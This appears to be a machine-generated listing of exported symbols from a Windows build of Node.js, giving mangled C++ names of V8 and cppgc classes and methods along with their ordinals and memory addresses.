                                                                                                                                                                                                                                    ??_7Marker@internal@cppgc@@6B@27030x14183f450
                                                                                                                                                                                                                                    ??_7MarkerBase@internal@cppgc@@6B@27040x14183f430
                                                                                                                                                                                                                                    ??_7MarkingVerifier@internal@cppgc@@6BConservativeTracingVisitor@12@@27050x14183f238
                                                                                                                                                                                                                                    ??_7MarkingVerifier@internal@cppgc@@6BStackVisitor@base@heap@@@27060x14183f200
                                                                                                                                                                                                                                    ??_7MarkingVerifierBase@internal@cppgc@@6BConservativeTracingVisitor@12@@27070x14183f220
                                                                                                                                                                                                                                    ??_7MarkingVerifierBase@internal@cppgc@@6BStackVisitor@base@heap@@@27080x14183f200
                                                                                                                                                                                                                                    ??_7MarkingVisitorBase@internal@cppgc@@6B@27090x14183f0f8
                                                                                                                                                                                                                                    ??_7MeasureMemoryDelegate@internal@v8@@6B@27100x1418a8b70
                                                                                                                                                                                                                                    ??_7MeasureMemoryDelegate@v8@@6B@27110x141f4b690
                                                                                                                                                                                                                                    ??_7MemoryMappedFile@OS@base@v8@@6B@27120x141d3f490
                                                                                                                                                                                                                                    ??_7MicrotaskQueue@internal@v8@@6B@27130x1418bc488
                                                                                                                                                                                                                                    ??_7MicrotaskQueue@v8@@6B@27140x141f4b650
                                                                                                                                                                                                                                    ??_7MultiIsolatePlatform@node@@6B@27150x141f4b798
                                                                                                                                                                                                                                    ??_7MutatorMarkingVisitor@internal@cppgc@@6B@27160x14183f148
                                                                                                                                                                                                                                    ??_7MutatorMinorGCMarkingVisitor@internal@v8@@6B@27170x1418aee70
                                                                                                                                                                                                                                    ??_7MutatorUnifiedHeapMarkingVisitor@internal@v8@@6B@27180x1418aee18
                                                                                                                                                                                                                                    ??_7NameConverter@disasm@@6B@27190x1418441e8
                                                                                                                                                                                                                                    ??_7NameProvider@cppgc@@6B@27200x14183a1a0
                                                                                                                                                                                                                                    ??_7NewSpace@internal@v8@@6B@27210x1418a8980
                                                                                                                                                                                                                                    ??_7NormalPageMemoryRegion@internal@cppgc@@6B@27220x14183ef50
                                                                                                                                                                                                                                    ??_7NormalPageSpace@internal@cppgc@@6B@27230x14183f808
                                                                                                                                                                                                                                    ??_7OFStream@internal@v8@@6B@27240x1418632e0
                                                                                                                                                                                                                                    ??_7OFStreamBase@internal@v8@@6B@27250x141842c80
                                                                                                                                                                                                                                    ??_7ObjectIterator@internal@v8@@6B@27260x141842840
                                                                                                                                                                                                                                    ??_7Operator@compiler@internal@v8@@6B@27270x141d4f770
                                                                                                                                                                                                                                    ??_7OutputStream@v8@@6B@27280x141f4b5b8
                                                                                                                                                                                                                                    ??_7PageAllocator@base@v8@@6B@27290x141d3f988
                                                                                                                                                                                                                                    ??_7PageMemoryRegion@internal@cppgc@@6B@27300x14183ef40
                                                                                                                                                                                                                                    ??_7PagedSpace@internal@v8@@6B@27310x141842968
                                                                                                                                                                                                                                    ??_7PagedSpaceObjectIterator@internal@v8@@6B@27320x141842958
                                                                                                                                                                                                                                    ??_7PersistentHandleVisitor@v8@@6B@27330x141f4b580
                                                                                                                                                                                                                                    ??_7Platform@cppgc@@6B@27340x141842850
                                                                                                                                                                                                                                    ??_7ProfilerCodeObserver@internal@v8@@6B@27350x141884118
                                                                                                                                                                                                                                    ??_7ProfilerEventsProcessor@internal@v8@@6BCodeEventObserver@12@@27360x1418840d8
                                                                                                                                                                                                                                    ??_7ProfilerEventsProcessor@internal@v8@@6BThread@base@2@@27370x1418840b8
                                                                                                                                                                                                                                    ??_7ProfilerListener@internal@v8@@6BCodeEventListener@12@@27380x14187e1f0
                                                                                                                                                                                                                                    ??_7ProfilerListener@internal@v8@@6BListener@WeakCodeRegistry@12@@27390x14187e288
                                                                                                                                                                                                                                    ??_7PropertyIterator@debug@v8@@6B@27400x141842b98
                                                                                                                                                                                                                                    ??_7ReadOnlySerializer@internal@v8@@6B@27410x141866d98
                                                                                                                                                                                                                                    ??_7Recorder@metrics@v8@@6B@27420x1418425e8
                                                                                                                                                                                                                                    ??_7Reducer@compiler@internal@v8@@6B@27430x141d489d8
                                                                                                                                                                                                                                    ??_7RedundancyElimination@compiler@internal@v8@@6B@27440x141d562d0
                                                                                                                                                                                                                                    ??_7RegExpBytecodeGenerator@internal@v8@@6B@27450x141877b20
                                                                                                                                                                                                                                    ??_7RegExpMacroAssemblerX64@internal@v8@@6B@27460x141843450
                                                                                                                                                                                                                                    ??_7RegisterConfiguration@internal@v8@@6B@27470x1418467b8
                                                                                                                                                                                                                                    ??_7RemoteObject@API@Runtime@protocol@v8_inspector@@6B@27480x14183a5a0
                                                                                                                                                                                                                                    ??_7Sampler@sampler@v8@@6B@27490x14189fe40
                                                                                                                                                                                                                                    ??_7SamplingEventsProcessor@internal@v8@@6BCodeEventObserver@12@@27500x141884108
                                                                                                                                                                                                                                    ??_7SamplingEventsProcessor@internal@v8@@6BThread@base@2@@27510x1418840e8
                                                                                                                                                                                                                                    ??_7ScopeIterator@debug@v8@@6B@27520x141842b98
                                                                                                                                                                                                                                    ??_7SearchMatch@API@Debugger@protocol@v8_inspector@@6B@27530x14183a5a0
                                                                                                                                                                                                                                    ??_7SetupIsolateDelegate@internal@v8@@6B@27540x1418a0a40
                                                                                                                                                                                                                                    ??_7SharedHeapSerializer@internal@v8@@6B@27550x1418649d8
                                                                                                                                                                                                                                    ??_7SharedTurboAssembler@internal@v8@@6B@27560x141842e40
                                                                                                                                                                                                                                    ??_7SimplifiedOperatorReducer@compiler@internal@v8@@6B@27570x141d56ed0
                                                                                                                                                                                                                                    ??_7SnapshotData@internal@v8@@6B@27580x1418469f8
                                                                                                                                                                                                                                    ??_7Space@internal@v8@@6B@27590x1418427a0
                                                                                                                                                                                                                                    ??_7SpaceIterator@internal@v8@@6B@27600x141842670
                                                                                                                                                                                                                                    ??_7StackTrace@API@Runtime@protocol@v8_inspector@@6B@27610x14183a5a0
                                                                                                                                                                                                                                    ??_7StackTraceId@API@Runtime@protocol@v8_inspector@@6B@27620x14183a5a0
                                                                                                                                                                                                                                    ??_7StackTraceIterator@debug@v8@@6B@27630x141842bf0
                                                                                                                                                                                                                                    ??_7StartupSerializer@internal@v8@@6B@27640x141863f50
                                                                                                                                                                                                                                    ??_7StreamingDecoder@wasm@internal@v8@@6B@27650x14184adb8
                                                                                                                                                                                                                                    ??_7StreamingProcessor@wasm@internal@v8@@6B@27660x14184ad68
                                                                                                                                                                                                                                    ??_7StringBuffer@v8_inspector@@6B@27670x14183a1a0
                                                                                                                                                                                                                                    ??_7SwitchBuilder@interpreter@internal@v8@@6B@27680x1418a0bb8
                                                                                                                                                                                                                                    ??_7SyncStreamingDecoder@wasm@internal@v8@@6B@27690x14184e9a0
                                                                                                                                                                                                                                    ??_7Thread@base@v8@@6B@27700x141d3f5d8
                                                                                                                                                                                                                                    ??_7TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@6B@27710x141f4b580
                                                                                                                                                                                                                                    ??_7TracedValue@tracing@v8@@6B@27720x141863830
                                                                                                                                                                                                                                    ??_7TryCatchBuilder@interpreter@internal@v8@@6B@27730x1418a0bc0
                                                                                                                                                                                                                                    ??_7TryFinallyBuilder@interpreter@internal@v8@@6B@27740x1418a0bc8
                                                                                                                                                                                                                                    ??_7TurboAssembler@internal@v8@@6B@27750x141842e70
                                                                                                                                                                                                                                    ??_7TurboAssemblerBase@internal@v8@@6B@27760x141842e40
                                                                                                                                                                                                                                    ??_7TypeNarrowingReducer@compiler@internal@v8@@6B@27770x141d57200
                                                                                                                                                                                                                                    ??_7TypedOptimization@compiler@internal@v8@@6B@27780x141d57220
                                                                                                                                                                                                                                    ??_7TypedSlotSet@internal@v8@@6B@27790x141842708
                                                                                                                                                                                                                                    ??_7TypedSlots@internal@v8@@6B@27800x141842700
                                                                                                                                                                                                                                    ??_7UnifiedHeapMarkingVerifier@internal@v8@@6BConservativeTracingVisitor@1cppgc@@@27810x14183f238
                                                                                                                                                                                                                                    ??_7UnifiedHeapMarkingVerifier@internal@v8@@6BStackVisitor@base@heap@@@27820x14183f200
                                                                                                                                                                                                                                    ??_7UnifiedHeapMarkingVisitorBase@internal@v8@@6B@27830x1418aedc0
                                                                                                                                                                                                                                    ??_7V8HeapExplorer@internal@v8@@6B@27840x1418810f8
                                                                                                                                                                                                                                    ??_7V8Inspector@v8_inspector@@6B@27850x14183a3b8
                                                                                                                                                                                                                                    ??_7V8InspectorClient@v8_inspector@@6B@27860x14183a2a8
                                                                                                                                                                                                                                    ??_7V8InspectorSession@v8_inspector@@6B@27870x14183a220
                                                                                                                                                                                                                                    ??_7V8StackTrace@v8_inspector@@6B@27880x14183a1b0
                                                                                                                                                                                                                                    ??_7ValueNumberingReducer@compiler@internal@v8@@6B@27890x141d4d8d0
                                                                                                                                                                                                                                    ??_7VirtualAddressSpace@base@v8@@6B@27900x141d403d0
                                                                                                                                                                                                                                    ??_7VirtualAddressSubspace@base@v8@@6B@27910x141d40448
                                                                                                                                                                                                                                    ??_7Visitor@cppgc@@6B@27920x14183f0a8
                                                                                                                                                                                                                                    ??_8?$basic_ostream@DU?$char_traits@D@std@@@std@@7B@27930x141713e00
                                                                                                                                                                                                                                    ??_8OFStream@internal@v8@@7B@27940x1418632e8
                                                                                                                                                                                                                                    ??_D?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ27950x14053b810
                                                                                                                                                                                                                                    ??_DOFStream@internal@v8@@QEAAXXZ27960x14053b850
                                                                                                                                                                                                                                    ??_FCpuProfilingOptions@v8@@QEAAXXZ27970x140098aa0
                                                                                                                                                                                                                                    ??_FRawMachineLabel@compiler@internal@v8@@QEAAXXZ27980x1410a61b0
                                                                                                                                                                                                                                    ??_FRegister@interpreter@internal@v8@@QEAAXXZ27990x14053c890
                                                                                                                                                                                                                                    ??_FSnapshotCreator@v8@@QEAAXXZ28000x1400978a0
                                                                                                                                                                                                                                    ??_FStack@base@heap@@QEAAXXZ28010x14053c8a0
                                                                                                                                                                                                                                    ??_FWasmModule@wasm@internal@v8@@QEAAXXZ28020x14053c8b0
                                                                                                                                                                                                                                    ??_UAlignedSlotAllocator@internal@v8@@CAPEAX_K@Z28030x1405396d0
                                                                                                                                                                                                                                    ??_UErrorThrower@wasm@internal@v8@@CAPEAX_K@Z28040x1405396d0
                                                                                                                                                                                                                                    ??_UEscapableHandleScope@v8@@CAPEAX_K@Z28050x1405396d0
                                                                                                                                                                                                                                    ??_UGlobalGCInfoTable@internal@cppgc@@CAPEAX_K@Z28060x1405396d0
                                                                                                                                                                                                                                    ??_UHandleScope@v8@@CAPEAX_K@Z28070x1405396d0
                                                                                                                                                                                                                                    ??_URegister@interpreter@internal@v8@@CAPEAX_K@Z28080x1405396d0
                                                                                                                                                                                                                                    ??_USealHandleScope@v8@@CAPEAX_K@Z28090x1405396d0
                                                                                                                                                                                                                                    ??_UTryCatch@v8@@CAPEAX_K@Z28100x1405396d0
                                                                                                                                                                                                                                    ??_VAlignedSlotAllocator@internal@v8@@CAXPEAX_K@Z28110x1405396d0
                                                                                                                                                                                                                                    ??_VErrorThrower@wasm@internal@v8@@CAXPEAX_K@Z28120x1405396d0
                                                                                                                                                                                                                                    ??_VEscapableHandleScope@v8@@CAXPEAX_K@Z28130x1405396d0
                                                                                                                                                                                                                                    ??_VGlobalGCInfoTable@internal@cppgc@@CAXPEAX_K@Z28140x1405396d0
                                                                                                                                                                                                                                    ??_VHandleScope@v8@@CAXPEAX_K@Z28150x1405396d0
                                                                                                                                                                                                                                    ??_VRegister@interpreter@internal@v8@@CAXPEAX_K@Z28160x1405396d0
                                                                                                                                                                                                                                    ??_VSealHandleScope@v8@@CAXPEAX_K@Z28170x1405396d0
                                                                                                                                                                                                                                    ??_VTryCatch@v8@@CAXPEAX_K@Z28180x1405396d0
                                                                                                                                                                                                                                    ?Abort@AsyncStreamingDecoder@wasm@internal@v8@@UEAAXXZ28190x1406684e0
                                                                                                                                                                                                                                    ?Abort@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4AbortReason@34@@Z28200x140a59020
                                                                                                                                                                                                                                    ?Abort@OS@base@v8@@SAXXZ28210x140ff32f0
                                                                                                                                                                                                                                    ?Abort@SyncStreamingDecoder@wasm@internal@v8@@UEAAXXZ28220x140667730
                                                                                                                                                                                                                                    ?Abort@TurboAssembler@internal@v8@@QEAAXW4AbortReason@23@@Z28230x1405f3d90
                                                                                                                                                                                                                                    ?Abort@WasmModuleObjectBuilderStreaming@v8@@QEAAXV?$MaybeLocal@VValue@v8@@@2@@Z28240x1400971a0
                                                                                                                                                                                                                                    ?Abort@WasmStreaming@v8@@QEAAXV?$MaybeLocal@VValue@v8@@@2@@Z28250x140639840
                                                                                                                                                                                                                                    ?AbortAll@LazyCompileDispatcher@internal@v8@@QEAAXXZ28260x140bd8a70
                                                                                                                                                                                                                                    ?AbortCSADcheck@CodeAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@@Z28270x1410a61d0
                                                                                                                                                                                                                                    ?AbortCSADcheck@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ28280x141051650
                                                                                                                                                                                                                                    ?AbortCSADcheck@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@@Z28290x1412180a0
                                                                                                                                                                                                                                    ?AbortConcurrentOptimization@Isolate@internal@v8@@QEAAXW4BlockingBehavior@23@@Z28300x140b63ca0
                                                                                                                                                                                                                                    ?AbortFunction@BackgroundCompileTask@internal@v8@@QEAAXXZ28310x140c00a30
                                                                                                                                                                                                                                    ?AbortJob@LazyCompileDispatcher@internal@v8@@QEAAXV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z28320x140bd8c30
                                                                                                                                                                                                                                    ?AbortOptimization@OptimizedCompilationInfo@internal@v8@@QEAAXW4BailoutReason@23@@Z28330x140be0660
                                                                                                                                                                                                                                    ?AbortedCodeGeneration@AssemblerBase@internal@v8@@UEAAXXZ28340x1400971a0
                                                                                                                                                                                                                                    ?Abspd@?$SharedTurboAssemblerBase@VTurboAssembler@internal@v8@@@internal@v8@@QEAAXVXMMRegister@23@0VRegister@23@@Z28350x1405a72d0
                                                                                                                                                                                                                                    ?Absps@?$SharedTurboAssemblerBase@VTurboAssembler@internal@v8@@@internal@v8@@QEAAXVXMMRegister@23@0VRegister@23@@Z28360x1405a7360
                                                                                                                                                                                                                                    ?AccessorConstant@Descriptor@internal@v8@@SA?AV123@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z28370x1408f3450
                                                                                                                                                                                                                                    ?AccountCommitted@BaseSpace@internal@v8@@QEAAX_K@Z28380x14053c910
                                                                                                                                                                                                                                    ?AccountUncommitted@BaseSpace@internal@v8@@QEAAX_K@Z28390x14053c930
                                                                                                                                                                                                                                    ?AccountedFree@PagedSpace@internal@v8@@QEAA_K_K0@Z28400x14053c940
                                                                                                                                                                                                                                    ?AcquireDataOwnership@AlignedCachedData@internal@v8@@QEAAXXZ28410x14061d210
                                                                                                                                                                                                                                    ?ActivationFrameAlignment@OS@base@v8@@SAHXZ28420x1400a92b0
                                                                                                                                                                                                                                    ?ActiveTierIsIgnition@JSFunction@internal@v8@@QEBA_NXZ28430x14097ea40
                                                                                                                                                                                                                                    ?Add@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@PEAVInternalIndex@23@@Z28440x140905ba0
                                                                                                                                                                                                                                    ?Add@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@PEAVInternalIndex@23@@Z28450x140905ce0
                                                                                                                                                                                                                                    ?Add@ActiveSystemPages@base@heap@@QEAA_K_K00@Z28460x140520200
                                                                                                                                                                                                                                    ?Add@ArrayList@internal@v8@@SA?AV?$Handle@VArrayList@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@2@Z28470x140905e20
                                                                                                                                                                                                                                    ?Add@ArrayList@internal@v8@@SA?AV?$Handle@VArrayList@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@@Z28480x140906000
                                                                                                                                                                                                                                    ?Add@ArrayList@internal@v8@@SA?AV?$Handle@VArrayList@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@VSmi@23@33@Z28490x140906140
                                                                                                                                                                                                                                    ?Add@BitVector@internal@v8@@QEAAXH@Z28500x14053c980
                                                                                                                                                                                                                                    ?Add@ByteData@PreparseDataBuilder@internal@v8@@QEAAXE@Z28510x1408b6560
                                                                                                                                                                                                                                    ?Add@BytecodeLoopAssignments@compiler@internal@v8@@QEAAXVRegister@interpreter@34@@Z28520x141247170
                                                                                                                                                                                                                                    ?Add@CodeCommentsWriter@internal@v8@@QEAAXIV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z28530x140c0e4d0
                                                                                                                                                                                                                                    ?Add@FreeList@internal@cppgc@@QEAAXUBlock@123@@Z28540x14051c910
                                                                                                                                                                                                                                    ?Add@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z28550x1410c23b0
                                                                                                                                                                                                                                    ?Add@NormalPageMemoryPool@internal@cppgc@@QEAAX_KPEAVNormalPageMemoryRegion@23@PEAE@Z28560x14050d330
                                                                                                                                                                                                                                    ?Add@ObjectHashSet@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@@Z28570x140906620
                                                                                                                                                                                                                                    ?Add@OrderedHashMap@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedHashMap@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2@Z28580x1408f7890
                                                                                                                                                                                                                                    ?Add@OrderedHashMapHandler@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2@Z28590x1408f7b40
                                                                                                                                                                                                                                    ?Add@OrderedHashSet@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedHashSet@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z28600x1408f7c00
                                                                                                                                                                                                                                    ?Add@OrderedHashSetHandler@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z28610x1408f7e90
                                                                                                                                                                                                                                    ?Add@OrderedNameDictionaryHandler@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z28620x1408f7f40
                                                                                                                                                                                                                                    ?Add@PageMemoryRegionTree@internal@cppgc@@QEAAXPEAVPageMemoryRegion@23@@Z28630x14050d380
                                                                                                                                                                                                                                    ?Add@PrototypeUsers@internal@v8@@SA?AV?$Handle@VWeakArrayList@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VMap@internal@v8@@@23@PEAH@Z28640x140906770
                                                                                                                                                                                                                                    ?Add@Set@v8@@QEAA?AV?$MaybeLocal@VSet@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z28650x140c77db0
                                                                                                                                                                                                                                    ?Add@SharedTurboAssembler@internal@v8@@QEAAXVRegister@23@VImmediate@23@@Z28660x1405a5c40
                                                                                                                                                                                                                                    ?Add@SmallOrderedHashMap@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashMap@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2@Z28670x1408f8010
                                                                                                                                                                                                                                    ?Add@SmallOrderedHashSet@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashSet@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z28680x1408f81a0
                                                                                                                                                                                                                                    ?Add@SmallOrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedNameDictionary@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z28690x1408f8310
                                                                                                                                                                                                                                    ?Add@StringSet@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VString@internal@v8@@@23@@Z28700x140906ab0
                                                                                                                                                                                                                                    ?AddAll@BitVector@internal@v8@@QEAAXXZ28710x14053c9d0
                                                                                                                                                                                                                                    ?AddAllocation@GCTracer@internal@v8@@QEAAXN@Z28720x140b19dd0
                                                                                                                                                                                                                                    ?AddAllocationObserver@AllocationCounter@internal@v8@@QEAAXPEAVAllocationObserver@23@@Z28730x140b4a150
                                                                                                                                                                                                                                    ?AddAllocationObserver@Space@internal@v8@@UEAAXPEAVAllocationObserver@23@@Z28740x140a9bbd0
                                                                                                                                                                                                                                    ?AddAllocationObserver@SpaceWithLinearArea@internal@v8@@UEAAXPEAVAllocationObserver@23@@Z28750x140a9bbe0
                                                                                                                                                                                                                                    ?AddArgument@AsmFunctionType@wasm@internal@v8@@QEAAXPEAVAsmType@234@@Z28760x14072f390
                                                                                                                                                                                                                                    ?AddArrayType@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEAVArrayType@234@I@Z28770x140633c10
                                                                                                                                                                                                                                    ?AddArrowFunctionFormalParameters@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@PEAVExpression@23@H@Z28780x1408b97d0
                                                                                                                                                                                                                                    ?AddAsmWasmOffset@WasmFunctionBuilder@wasm@internal@v8@@QEAAX_K0@Z28790x140633c70
                                                                                                                                                                                                                                    ?AddAttachedObject@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@IEAAXV?$Handle@VHeapObject@internal@v8@@@23@@Z28800x1407d1bb0
                                                                                                                                                                                                                                    ?AddAttachedObject@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@IEAAXV?$Handle@VHeapObject@internal@v8@@@23@@Z28810x1407d1bb0
                                                                                                                                                                                                                                    ?AddBeforeCallEnteredCallback@Isolate@internal@v8@@QEAAXP6AXPEAV13@@Z@Z28820x140b63cc0
                                                                                                                                                                                                                                    ?AddBeforeCallEnteredCallback@Isolate@v8@@QEAAXP6AXPEAV12@@Z@Z28830x140c78140
                                                                                                                                                                                                                                    ?AddBignum@Bignum@base@v8@@QEAAXAEBV123@@Z28840x141003920
                                                                                                                                                                                                                                    ?AddBinaryOpICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ28850x14053ca00
                                                                                                                                                                                                                                    ?AddBlock@LocalHandles@internal@v8@@AEAAPEA_KXZ28860x140b4abc0
                                                                                                                                                                                                                                    ?AddBlockRequiringSpillOperand@TopLevelLiveRange@compiler@internal@v8@@QEAAXVRpoNumber@234@PEBVTopTierRegisterAllocationData@234@@Z28870x141096010
                                                                                                                                                                                                                                    ?AddBranch@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@00@Z28880x141067de0
                                                                                                                                                                                                                                    ?AddBuildEmbedderGraphCallback@HeapProfiler@v8@@QEAAXP6AXPEAVIsolate@2@PEAVEmbedderGraph@2@PEAX@Z2@Z28890x140c78150
                                                                                                                                                                                                                                    ?AddCall@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@00@Z28900x141067ec0
                                                                                                                                                                                                                                    ?AddCallCompletedCallback@Isolate@internal@v8@@QEAAXP6AXPEAV13@@Z@Z28910x140b63d00
                                                                                                                                                                                                                                    ?AddCallCompletedCallback@Isolate@v8@@QEAAXP6AXPEAV12@@Z@Z28920x140c78160
                                                                                                                                                                                                                                    ?AddCallICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ28930x14053ca20
                                                                                                                                                                                                                                    ?AddCallback@CompilationState@wasm@internal@v8@@QEAAXV?$unique_ptr@VCompilationEventCallback@wasm@internal@v8@@U?$default_delete@VCompilationEventCallback@wasm@internal@v8@@@std@@@std@@@Z28940x14068d190
                                                                                                                                                                                                                                    ?AddCaseEquivalents@CharacterRange@internal@v8@@SAXPEAVIsolate@23@PEAVZone@23@PEAV?$ZoneList@VCharacterRange@internal@v8@@@23@_N@Z28950x140849580
                                                                                                                                                                                                                                    ?AddCategory@FreeListManyCached@internal@v8@@UEAA_NPEAVFreeListCategory@23@@Z28960x140b1ed00
                                                                                                                                                                                                                                    ?AddCharacterCore@StringHasher@internal@v8@@SAIIG@Z28970x14053ca40
                                                                                                                                                                                                                                    ?AddChild@PreparseDataBuilder@internal@v8@@AEAAXPEAV123@@Z28980x1408b6580
                                                                                                                                                                                                                                    ?AddClassEscape@CharacterRange@internal@v8@@SAXW4StandardCharacterSet@23@PEAV?$ZoneList@VCharacterRange@internal@v8@@@23@_NPEAVZone@23@@Z28990x140849900
                                                                                                                                                                                                                                    ?AddClassStaticBlock@Parser@internal@v8@@AEAAXPEAVBlock@23@PEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@@Z29000x1408b9980
                                                                                                                                                                                                                                    ?AddCloneObjectSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29010x14053ca60
                                                                                                                                                                                                                                    ?AddClonedNode@GraphAssembler@compiler@internal@v8@@IEAAPEAVNode@234@PEAV5234@@Z29020x1410e12e0
                                                                                                                                                                                                                                    ?AddCode@CodeMap@internal@v8@@QEAAX_KPEAVCodeEntry@23@I@Z29030x140865780
                                                                                                                                                                                                                                    ?AddCode@NativeModule@wasm@internal@v8@@QEAA?AV?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@HAEBVCodeDesc@34@HIV?$Vector@$$CBE@base@4@1W4Kind@WasmCode@234@W4ExecutionTier@234@W4ForDebugging@234@@Z29040x14065db80
                                                                                                                                                                                                                                    ?AddCodeEventListener@Logger@internal@v8@@QEAAXPEAVCodeEventListener@23@@Z29050x140a0e8b0
                                                                                                                                                                                                                                    ?AddCodeForTesting@NativeModule@wasm@internal@v8@@QEAAPEAVWasmCode@234@V?$Handle@VCode@internal@v8@@@34@@Z29060x14065dd00
                                                                                                                                                                                                                                    ?AddCodeMemoryChunk@Isolate@internal@v8@@QEAAXPEAVMemoryChunk@23@@Z29070x1400971a0
                                                                                                                                                                                                                                    ?AddCodeMemoryRange@Isolate@internal@v8@@AEAAXUMemoryRange@3@@Z29080x140b63d40
                                                                                                                                                                                                                                    ?AddCodeRange@Isolate@internal@v8@@QEAAX_K0@Z29090x140b63f60
                                                                                                                                                                                                                                    ?AddCodeSpaceLocked@NativeModule@wasm@internal@v8@@AEAAXVAddressRegion@base@4@@Z29100x14065e140
                                                                                                                                                                                                                                    ?AddCodeTarget@AssemblerBase@internal@v8@@IEAAHV?$Handle@VCode@internal@v8@@@23@@Z29110x140c0eec0
                                                                                                                                                                                                                                    ?AddCodeWithCodeSpace@NativeModule@wasm@internal@v8@@AEAA?AV?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@HAEBVCodeDesc@34@HIV?$Vector@$$CBE@base@4@1W4Kind@WasmCode@234@W4ExecutionTier@234@W4ForDebugging@234@V?$Vector@E@94@AEBUJumpTablesRef@1234@@Z29120x14065e7d0
                                                                                                                                                                                                                                    ?AddCompactionEvent@GCTracer@internal@v8@@QEAAXN_K@Z29130x140b19f60
                                                                                                                                                                                                                                    ?AddCompareICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29140x14053ca80
                                                                                                                                                                                                                                    ?AddCompiledCode@NativeModule@wasm@internal@v8@@QEAA?AV?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@UWasmCompilationResult@234@@Z29150x14065eb50
                                                                                                                                                                                                                                    ?AddCompiledCode@NativeModule@wasm@internal@v8@@QEAA?AV?$vector@V?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@V?$allocator@V?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@@2@@std@@V?$Vector@UWasmCompilationResult@wasm@internal@v8@@@base@4@@Z29160x14065ec80
                                                                                                                                                                                                                                    ?AddConcurrentlyMarkedBytes@IncrementalMarkingSchedule@internal@cppgc@@QEAAX_K@Z29170x140517190
                                                                                                                                                                                                                                    ?AddConstant@InstructionSequence@compiler@internal@v8@@QEAAHHVConstant@234@@Z29180x14057e420
